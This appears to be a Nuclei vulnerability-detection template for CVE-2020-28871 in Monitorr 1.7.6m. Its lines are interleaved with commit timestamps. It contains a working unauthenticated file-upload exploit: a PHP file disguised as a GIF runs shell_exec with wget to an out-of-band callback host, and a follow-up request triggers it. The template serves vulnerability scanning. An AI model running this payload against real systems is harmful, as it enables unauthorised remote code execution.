2021-07-20 06:03:16 +00:00
id : CVE-2020-28871
2021-07-19 23:20:18 +00:00
info :
name : Monitorr 1.7.6m - Unauthenticated Remote Code Execution
author : gy741
severity : critical
description : This template detects an Monitorr 1.7.6m a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in web application. An unauthorized attacker with web access to could upload and execute a specially crafted file leading to remote code execution within the Monitorr.
2021-08-18 11:37:49 +00:00
reference :
2021-07-20 06:03:16 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-28871
2021-07-19 23:20:18 +00:00
- https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
- https://www.exploit-db.com/exploits/48980
2021-07-20 06:03:16 +00:00
tags : cve,cve2020,monitorr,rce,oob
2021-07-19 23:20:18 +00:00
requests :
- raw :
- |
POST /assets/php/upload.php HTTP/1.1
Host : {{Hostname}}
Accept-Encoding : gzip, deflate
Accept : text/plain, */*; q=0.01
Connection : close
Accept-Language : en-US,en;q=0.5
X-Requested-With : XMLHttpRequest
Content-Type : multipart/form-data; boundary=---------------------------31046105003900160576454225745
Origin : http://{{Hostname}}
Referer : http://{{Hostname}}
-----------------------------31046105003900160576454225745
2021-07-20 06:03:16 +00:00
Content-Disposition : form-data; name="fileToUpload"; filename="{{randstr}}.php"
2021-07-19 23:20:18 +00:00
Content-Type : image/gif
GIF89a213213123<?php shell_exec("wget -c http://{{interactsh-url}}");
-----------------------------31046105003900160576454225745 --
- |
2021-07-20 06:03:16 +00:00
GET /assets/data/usrimg/{{tolower("{{randstr}}.php")}} HTTP/1.1
2021-07-19 23:20:18 +00:00
Host : {{Hostname}}
matchers :
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
- "http"
